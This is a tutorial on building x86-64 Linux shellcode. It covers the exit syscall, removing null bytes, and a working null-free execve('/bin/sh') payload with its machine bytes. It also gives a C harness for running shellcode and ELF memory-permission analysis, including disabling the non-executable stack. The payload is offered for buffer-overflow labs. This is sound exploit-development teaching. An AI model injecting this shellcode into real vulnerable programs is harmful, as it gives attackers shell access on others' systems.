Build Your Own Shellcode

A shellcode is a piece of compiled code that launches a shell when executed. It is typically given as input to a program so that the program eventually executes it. In this article, I am going to:

- Introduce the background information needed to understand the overall process
- Create an assembly program that invokes the exit system call (exitcode)
- Create an assembly program that launches a shell (shellcode)

Background information

Shellcode operates at the lowest level of the system, so some important details are architecture dependent. To run it on a target system, we need to know the low-level details of the target architecture.

System call

A system call is the way a program asks the kernel to execute a function on its behalf. In Linux there are several ways to invoke a system call; the most common ones are int 0x80 and syscall. The int 0x80 method is the legacy way of invoking a system call. It is available on both x86 and x64, but on x64 it should be avoided: it is slower, and it enters the kernel through the 32-bit interface, with 32-bit system call numbers and argument registers. The syscall instruction is the default way of invoking a system call and is only available on x64.

To invoke a system call we need to know how to interact with the system, because each architecture has its own way to transition to kernel mode. On Ubuntu, the man page is a good place to start: $ man syscall. There you can see that each system call has a number associated with it. Under “Architecture calling conventions”, the first table shows that the x86-64 architecture requires the system call number to be placed in the rax register, and that the return value is placed in rax as well. The second table shows which registers hold the arguments. On x86-64 the arguments go in rdi, rsi, rdx, r10, r8 and r9 (in this order). Linux system calls take at most six arguments, so on x86-64 no argument is passed on the stack.
Now we need to know the numbers associated with the system calls. These numbers are usually defined in the unistd_64.h file for 64-bit architectures (or in the unistd_32.h file for 32-bit architectures). On 64-bit Ubuntu 18.04, the system call numbers for the 64-bit architecture are in:

    /usr/src/linux-headers-4.15.0-52-generic/arch/x86/include/generated/uapi/asm/unistd_64.h

(For the 32-bit architecture they are in /usr/src/linux-headers-4.15.0-52-generic/arch/x86/include/generated/uapi/asm/unistd_32.h.)

Build Simple Example: exitcode

In this example, we are going to build an assembly program that invokes the exit system call. Let’s start by looking at the manual: $ man exit. (With $ man exit you are actually looking at the C function wrapper around the system call, but the semantics and the order of the parameters are kept.) This function terminates the running program and returns the integer passed as its first parameter as the exit status. To find the number of the exit system call we need to look at the unistd_64.h file, where it is defined as 60. The system call number needs to be placed in the rax register. Now let’s write a simple assembly program that invokes the exit system call:

    ; file: exit64.asm
    global _start
    section .text
    _start:
        mov rax, 0x3c   ; system call number: 60 = exit
        mov rdi, 0x05   ; first parameter: exit status 5
        syscall

In the first mov, 0x3c is the hexadecimal form of the decimal number 60, i.e., the exit system call number. In the second mov, 0x05 is the first parameter of the exit system call (i.e., the value returned when the program ends). Let’s now assemble and link the code:

    $ nasm -f elf64 -o exit64.o exit64.asm
    $ ld -o exit64 exit64.o

If we execute exit64 we can see that the return value is indeed 5:

    $ ./exit64
    $ echo $?
    5

To test this program we can place its machine code into a C test program (as in How to Test a Shellcode). To extract the generated machine code we can look at the disassembly:

    $ objdump -M intel -d exit64

    exit64:     file format elf64-x86-64

    Disassembly of section .text:

    0000000000400080 <_start>:
      400080:   b8 3c 00 00 00    mov    eax,0x3c
      400085:   bf 05 00 00 00    mov    edi,0x5
      40008a:   0f 05             syscall

The hexadecimal numbers that follow each address are the machine code generated from the assembly instruction shown on the same row. This is what you want to copy to the test program, i.e.: b8 3c 00 00 00 bf 05 00 00 00 0f 05. To write a hexadecimal byte inside a C string, put \x before the number; the exitcode therefore becomes \xb8\x3c\x00\x00\x00\xbf\x05\x00\x00\x00\x0f\x05.

What happens if you give this string as input to a program that has a buffer overflow vulnerability? Will it work? (Try it on Basic Stack-Based Buffer Overflow.) It will not work. Why? To give this string as input to a program there are a few more things to take into account. In C, a string ends with the null byte, i.e., \0 or \x00. The functions that read or copy strings stop when they reach the end of the string (see the man pages of those functions). We can immediately see that the exitcode contains a lot of null bytes, so those functions will not copy it in full. In some circumstances null bytes are not a problem, but this depends on the input method used by the program.

How to avoid null bytes?
Let’s revise the exitcode:

    ; file: exit64_nnb.asm
    global _start
    section .text
    _start:
        mov al, 0x3c    ; writes only the low byte of rax; the rest of rax must already be zero
        xor rdi,rdi     ; rdi = 0 without encoding a zero immediate
        inc di
        inc di
        inc di
        inc di
        inc di          ; rdi = 5
        syscall

With objdump we can see that this assembly code does not produce any null bytes:

    $ objdump -M intel -d ./exit64_nnb

    ./exit64_nnb:     file format elf64-x86-64

    Disassembly of section .text:

    0000000000400080 <_start>:
      400080:   b0 3c       mov    al,0x3c
      400082:   48 31 ff    xor    rdi,rdi
      400085:   66 ff c7    inc    di
      400088:   66 ff c7    inc    di
      40008b:   66 ff c7    inc    di
      40008e:   66 ff c7    inc    di
      400091:   66 ff c7    inc    di
      400094:   0f 05       syscall

This is code that we are able to give as input to a function that reads input data.

Build the shellcode

The easiest way to launch a shell is to invoke the execve system call with the appropriate parameters (see $ man execve). The execve system call takes 3 parameters. The first points to a string holding the path of the program to execute. The second is an array of string pointers that point to the command-line arguments of that program. The third is an array of string pointers that point to the environment variables. We want to launch the shell /bin/sh with no arguments. Let’s see the code that opens a shell by invoking execve:

    ; file: execve64.asm
    global _start
    section .text
    _start:
        xor rdi,rdi
        xor rsi,rsi
        xor rdx,rdx

        mov rdi,0x68732f6e69622f2f
        shr rdi,0x08
        push rdi
        push rsp
        pop rdi

        push 0x3b
        pop rax
        syscall

As described in Background information, the system call number needs to be placed in rax, and the parameters in rdi, rsi and rdx. To fill rdi with the first parameter we need a pointer to the string /bin/sh. This is achieved by the mov, shr and push rdi instructions. The mov loads the value 0x68732f6e69622f2f into rdi. This number is the hexadecimal equivalent of the string hs/nib//, which is the reverse of //bin/sh (i.e., a shell path). Why the reverse string?
On a little-endian architecture, a number is stored in an 8-byte memory location starting from its least significant byte, which goes at the lowest address. The hexadecimal byte 0x68 (the most significant byte of 0x68732f6e69622f2f) is therefore stored at the highest address, i.e., in the rightmost position when memory is read from low to high addresses, and the bytes in memory read as //bin/sh. After the push rdi executes, rsp points to the first byte of the string. (You can see the byte order of your architecture with the command $ lscpu.)

The shr shifts the value 8 bits to the right. Why? Because this fills the most significant byte of rdi with zeros (and drops one of the two leading slashes). Why does this matter? Because every string in C is null terminated (i.e., terminated by a zero byte). I could have loaded the value 0x0068732f6e69622f directly with the mov, but this would generate a null byte in the machine code, which is better avoided if we aim to use this code as a string.

The push rdi pushes the shell string onto the stack. Why? On a running program, after this push, the stack pointer register rsp points to the shell string on the stack. For this reason, push rsp saves the value of the stack pointer on the stack and pop rdi pops that address into the rdi register (i.e., the first parameter of the execve system call).

The three xor instructions at the top clear the registers (i.e., set them to zero). In this way the second and third parameters are already set, because we do not need to invoke the shell with any arguments and we do not need environment variables in this case. The push 0x3b and pop rax pair places the value 0x3b in rax because 0x3b (59 in decimal) is the number of the execve system call (see how to find this number in Background information).
Now, the last thing we need to do is to assemble and link the code and extract the generated machine code:

    $ nasm -f elf64 -o execve64.o execve64.asm
    $ ld -o execve64 execve64.o
    $ objdump -M intel -d ./execve64

    ./execve64:     file format elf64-x86-64

    Disassembly of section .text:

    0000000000400080 <_start>:
      400080:   48 31 ff                xor    rdi,rdi
      400083:   48 31 f6                xor    rsi,rsi
      400086:   48 31 d2                xor    rdx,rdx
      400089:   48 bf 2f 2f 62 69 6e    movabs rdi,0x68732f6e69622f2f
      400090:   2f 73 68
      400093:   48 c1 ef 08             shr    rdi,0x8
      400097:   57                      push   rdi
      400098:   54                      push   rsp
      400099:   5f                      pop    rdi
      40009a:   6a 3b                   push   0x3b
      40009c:   58                      pop    rax
      40009d:   0f 05                   syscall

To test this program we can place its machine code into a test program (as in How to Test a Shellcode). As we can see, there are no null bytes in the generated machine code, so this shellcode is suitable to be used as input in a buffer overflow; try it out on Basic Stack-Based Buffer Overflow.

There are several ways to write a shellcode and this one is just an example. The challenge in shellcoding is to write the smallest possible shellcode. This is the end of this shellcoding walkthrough. I hope it was helpful; additional resources follow.

Additional resources

More to read about syscall:
More to read about exit system call:

How to Test a Shellcode

A shellcode is a piece of compiled code, typically given as input to a program, that launches a shell when executed (see Build Your Own Shellcode). To test a shellcode we are going to use the following code:

    // filename: test_shellcode.c
    char *code = "<shellcodegoeshere>";

    int main() {
        void (*shell)();
        shell = (void (*)())code;
        (*shell)();
    }

The string assigned to code is where we copy the shellcode that we want to test. Inside main, we first declare the variable shell as a pointer to a function that returns void and takes no arguments. Then we cast the string pointer code to the same type as the variable shell (i.e., a pointer to a function that returns void and takes no arguments). Finally, we call the function pointed to by the shell variable (passing no parameters). Once we have filled the code variable with the shellcode, we can compile the program and run it:

    $ gcc -o test_shellcode test_shellcode.c
    $ ./test_shellcode

In this way we can find out whether the shellcode works on the current system. To give a shellcode as input to a program in order to execute it, we have to be careful about a few more things, as explained in Build Your Own Shellcode.

Understanding the test program

The content pointed to by the variable code is going to be allocated in an executable portion of the memory layout. The command $ readelf -a ./test_shellcode gives a lot of information. Let’s try to break it down into pieces that are easy to digest. If we examine the symbol table with $ readelf -s ./test_shellcode we can see something like this:

    Symbol table '.symtab' contains 62 entries:
       Num:    Value          Size Type    Bind   Vis      Ndx Name
         0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
         1: 0000000000000238     0 SECTION LOCAL  DEFAULT    1
         2: 0000000000000254     0 SECTION LOCAL  DEFAULT    2
         3: 0000000000000274     0 SECTION LOCAL  DEFAULT    3
        .........
        59: 0000000000000000     0 FUNC    WEAK   DEFAULT  UND __cxa_finalize@@GLIBC_2.2
        60: 00000000000004d0     0 FUNC    GLOBAL DEFAULT   10 _init
        61: 0000000000201010     8 OBJECT  GLOBAL DEFAULT   22 code

In the last row, the symbol code is shown with a Value of 0000000000201010. The Value column represents the address of the symbol. The command $ readelf -S ./test_shellcode shows the section headers of the ELF file:

    Section Headers:
      [Nr] Name              Type             Address           Offset
           Size              EntSize          Flags  Link  Info  Align
      [ 0]                   NULL             0000000000000000  00000000
           0000000000000000  0000000000000000           0     0     0
      [ 1] .interp           PROGBITS         0000000000000238  00000238
           000000000000001c  0000000000000000   A       0     0     1
      [ 2] .note.ABI-tag     NOTE             0000000000000254  00000254
           0000000000000020  0000000000000000   A       0     0     4
      ......
      [21] .got              PROGBITS         0000000000200fc0  00000fc0
           0000000000000040  0000000000000008  WA       0     0     8
      [22] .data             PROGBITS         0000000000201000  00001000
           0000000000000018  0000000000000000  WA       0     0     8
      [23] .bss              NOBITS           0000000000201018  00001018
           0000000000000008  0000000000000000  WA       0     0     1

Here, we can see that the .data section has an address of 0000000000201000 and a size of 0000000000000018. The symbol code is located at address 0000000000201010, i.e., inside the .data section. We could have gathered the same information by running $ objdump -t ./test_shellcode:

    SYMBOL TABLE:
    0000000000000238 l    d  .interp        0000000000000000  .interp
    0000000000000254 l    d  .note.ABI-tag  0000000000000000  .note.ABI-tag
    0000000000000274 l    d                 0000000000000000
    0000000000000298 l    d  .gnu.hash      0000000000000000  .gnu.hash
    00000000000002b8 l    d  .dynsym        0000000000000000  .dynsym
    ......
    0000000000000000  w      *UND*          0000000000000000  _ITM_registerTMCloneTable
    0000000000000000  w    F *UND*          0000000000000000  __cxa_finalize@@GLIBC_2.2.5
    00000000000004d0 g     F .init          0000000000000000  _init
    0000000000201010 g     O .data          0000000000000008  code

In the last row, we can see that the symbol code is declared in the section .data.
To know the permissions that a section has, we have to look at the Program Headers and at the Section to Segment mapping by running $ readelf -a ./test_shellcode:

    Program Headers:
      Type           Offset             VirtAddr           PhysAddr
                     FileSiz            MemSiz              Flags  Align
      PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                     0x00000000000001f8 0x00000000000001f8  R      0x8
      INTERP         0x0000000000000238 0x0000000000000238 0x0000000000000238
                     0x000000000000001c 0x000000000000001c  R      0x1
          [Requesting program interpreter: /lib64/]
      LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                     0x0000000000000818 0x0000000000000818  R E    0x200000
      LOAD           0x0000000000000df0 0x0000000000200df0 0x0000000000200df0
                     0x0000000000000228 0x0000000000000230  RW     0x200000
      DYNAMIC        0x0000000000000e00 0x0000000000200e00 0x0000000000200e00
                     0x00000000000001c0 0x00000000000001c0  RW     0x8
      NOTE           0x0000000000000254 0x0000000000000254 0x0000000000000254
                     0x0000000000000044 0x0000000000000044  R      0x4
      GNU_EH_FRAME   0x00000000000006d4 0x00000000000006d4 0x00000000000006d4
                     0x000000000000003c 0x000000000000003c  R      0x4
      GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                     0x0000000000000000 0x0000000000000000  RW     0x10
      GNU_RELRO      0x0000000000000df0 0x0000000000200df0 0x0000000000200df0
                     0x0000000000000210 0x0000000000000210  R      0x1

     Section to Segment mapping:
      Segment Sections...
       00
       01     .interp
       02     .interp .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
       03     .init_array .fini_array .dynamic .got .data .bss
       04     .dynamic
       05     .note.ABI-tag
       06     .eh_frame_hdr
       07
       08     .init_array .fini_array .dynamic .got

Here we can see that the .data section is mapped into segment 03 (i.e., the 4th segment). Under “Program Headers” we can count the segments from the top: the first is the PHDR segment, the second is INTERP, and the fourth is a LOAD segment with permission to read and write (but not execute!). If we don’t have the execute permission, how come we are able to run the code?
Let’s run the code in GDB to clarify this point (I am using GEF):

    Reading symbols from ./test_shellcode...(no debugging symbols found)...done.
    gef➤  b main
    Breakpoint 1 at 0x61e
    gef➤  r
    Starting program: /home/pippo/ctf/lectures/build_shellcode/test

    Breakpoint 1, 0x000055555555461e in main ()
    gef➤  info address code
    Symbol "code" is at 0x555555755010 in a file compiled without debugging.
    gef➤  x/1g 0x555555755010
    0x555555755010 <code>:  0x5555555546c4
    gef➤  x/1g 0x5555555546c4
    0x5555555546c4: 0x5bf0000003cb8

With info address code we print the address of the global variable code, which is located at 0x555555755010. This variable is a pointer to the memory location 0x5555555546c4, as the first x/1g shows. The second x/1g shows what is stored there: 0x5bf0000003cb8, which read in little-endian byte order is b8 3c 00 00 00 bf 05 00, i.e., the beginning of the exitcode. To understand the permissions of those different memory locations we can run gef➤ vmmap:

    gef➤  vmmap
    Start              End                Offset             Perm Path
    0x0000555555554000 0x0000555555555000 0x0000000000000000 r-x /home/pippo/ctf/lectures/build_shellcode/test_shellcode
    0x0000555555754000 0x0000555555755000 0x0000000000000000 r-- /home/pippo/ctf/lectures/build_shellcode/test_shellcode
    0x0000555555755000 0x0000555555756000 0x0000000000001000 rw- /home/pippo/ctf/lectures/build_shellcode/test_shellcode
    0x00007ffff79e4000 0x00007ffff7bcb000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/
    0x00007ffff7bcb000 0x00007ffff7dcb000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/
    0x00007ffff7dcb000 0x00007ffff7dcf000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/
    0x00007ffff7dcf000 0x00007ffff7dd1000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/
    0x00007ffff7dd1000 0x00007ffff7dd5000 0x0000000000000000 rw-
    0x00007ffff7dd5000 0x00007ffff7dfc000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/
    0x00007ffff7fcd000 0x00007ffff7fcf000 0x0000000000000000 rw-
    0x00007ffff7ff7000 0x00007ffff7ffa000 0x0000000000000000 r-- [vvar]
    0x00007ffff7ffa000 0x00007ffff7ffc000 0x0000000000000000 r-x [vdso]
    0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000027000 r-- /lib/x86_64-linux-gnu/
    0x00007ffff7ffd000 0x00007ffff7ffe000 0x0000000000028000 rw- /lib/x86_64-linux-gnu/
    0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-
    0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
    0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]

(gef➤ vmmap shows the same information as cat /proc/{process_id}/maps, where process_id is the process id of the debugged program. To obtain the process id of the currently running debugged program run info inferiors.)

In the first three rows we can see that there are 3 memory regions that map the test_shellcode executable with different permissions. The variable code (0x555555755010) is located in a memory region that has read and write permissions (third row). This is the same information that we obtained previously by reading the ELF file (with the readelf command). The address pointed to by the variable code (0x5555555546c4), however, is located in a memory region that has read and execute permissions (first row). The string literal itself is not stored in .data: only the pointer is. The bytes of the string sit in the read-only data, which in this binary is mapped in the same segment as .text (segment 02 in the Section to Segment mapping lists .rodata), and that segment is executable.

Alternative test code

Sometimes on the Internet you see code like this:

    int main() {
        char code[] = "\xb8\x3c\x00\x00\x00\xbf\x05\x00\x00\x00\x0f\x05";
        void (*shell)();
        shell = (void (*)())code;
        (*shell)();
        //shell();
    }

Here, the code variable is declared inside the main function and it is NOT a pointer: it is an array, so the bytes themselves live in the variable. This code WILL NOT work if compiled with:

    $ gcc -o test_shellcode ./test_shellcode.c

The code compiles correctly but produces a Segmentation fault when executed. The reason is simple: the code variable is located on the stack, and since the stack is a non-executable memory region, the system raises a segmentation fault as soon as an instruction is fetched from it. This code WILL work if compiled with the flag that makes the stack executable:

    $ gcc -o test_shellcode -z execstack ./test_shellcode.c

(Alternatively, we can use the execstack tool to change the executable stack flag of an ELF file.)